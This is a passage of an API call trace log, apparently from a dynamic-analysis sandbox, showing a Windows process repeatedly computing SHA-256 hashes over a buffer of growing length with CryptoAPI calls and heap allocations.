	[0153.408] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.408] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.408] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.409] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.409] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0153.409] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.409] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308298
	[0153.409] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308298, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308298, pdwDataLen=0x128aac) returned 1
	[0153.409] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.409] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.409] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.409] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.409] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0153.409] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.409] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23082c0
	[0153.410] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23082c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23082c0, pdwDataLen=0x128aac) returned 1
	[0153.410] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.410] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.410] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.410] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.410] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0153.410] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.410] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23082e8
	[0153.410] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23082e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23082e8, pdwDataLen=0x128aac) returned 1
	[0153.410] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.410] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.410] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.411] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.411] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0153.411] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.411] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308310
	[0153.411] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308310, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308310, pdwDataLen=0x128aac) returned 1
	[0153.411] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.411] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.411] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.411] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.411] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0153.411] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.411] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308338
	[0153.411] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308338, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308338, pdwDataLen=0x128aac) returned 1
	[0153.411] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.411] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.411] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.412] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.412] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0153.412] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.412] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308360
	[0153.412] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308360, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308360, pdwDataLen=0x128aac) returned 1
	[0153.412] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.412] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.412] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.412] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.412] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0153.412] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.412] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308388
	[0153.412] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308388, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308388, pdwDataLen=0x128aac) returned 1
	[0153.412] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.412] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.412] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.413] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.413] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0153.413] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.413] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23083b0
	[0153.413] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23083b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23083b0, pdwDataLen=0x128aac) returned 1
	[0153.413] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.413] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.413] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.413] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.413] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0153.413] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.414] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23083d8
	[0153.414] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23083d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23083d8, pdwDataLen=0x128aac) returned 1
	[0153.414] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.414] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.414] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.414] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.414] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0153.414] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.414] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308400
	[0153.414] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308400, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308400, pdwDataLen=0x128aac) returned 1
	[0153.414] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.414] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.414] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.415] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.415] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0153.415] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.415] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308428
	[0153.415] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308428, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308428, pdwDataLen=0x128aac) returned 1
	[0153.415] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.415] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.415] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.415] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.415] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0153.415] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.415] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308450
	[0153.415] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308450, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308450, pdwDataLen=0x128aac) returned 1
	[0153.415] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.415] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.415] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.416] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.416] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0153.416] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.416] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308478
	[0153.416] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308478, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308478, pdwDataLen=0x128aac) returned 1
	[0153.416] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.416] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.416] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.416] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.416] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0153.416] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.416] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23084a0
	[0153.416] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23084a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23084a0, pdwDataLen=0x128aac) returned 1
	[0153.416] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.416] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.416] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.417] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.417] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0153.417] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.417] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23084c8
	[0153.417] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23084c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23084c8, pdwDataLen=0x128aac) returned 1
	[0153.417] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.417] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.417] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.417] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.417] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0153.417] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.417] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23084f0
	[0153.417] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23084f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23084f0, pdwDataLen=0x128aac) returned 1
	[0153.417] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.417] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.417] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.418] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.418] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0153.418] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308518
	[0153.418] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308518, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308518, pdwDataLen=0x128aac) returned 1
	[0153.418] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.418] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.418] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.418] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.418] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0153.418] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308540
	[0153.418] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308540, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308540, pdwDataLen=0x128aac) returned 1
	[0153.418] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.419] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.419] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.419] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.419] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0153.419] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.419] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308568
	[0153.419] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308568, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308568, pdwDataLen=0x128aac) returned 1
	[0153.419] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.419] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.419] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.419] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.420] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0153.420] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.420] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308590
	[0153.420] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308590, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308590, pdwDataLen=0x128aac) returned 1
	[0153.420] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.420] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.420] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.420] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.420] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0153.420] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.420] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23085b8
	[0153.420] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23085b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23085b8, pdwDataLen=0x128aac) returned 1
	[0153.420] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.420] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.420] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.421] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.421] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0153.421] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.421] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23085e0
	[0153.421] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23085e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23085e0, pdwDataLen=0x128aac) returned 1
	[0153.421] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.421] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.421] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.421] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.421] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0153.421] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.421] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308608
	[0153.421] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308608, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308608, pdwDataLen=0x128aac) returned 1
	[0153.421] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.421] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.421] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.422] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.422] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0153.422] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.422] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308630
	[0153.422] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308630, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308630, pdwDataLen=0x128aac) returned 1
	[0153.422] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.422] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.422] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.422] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.422] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0153.422] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.422] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308658
	[0153.422] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308658, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308658, pdwDataLen=0x128aac) returned 1
	[0153.422] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.422] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.422] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.423] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
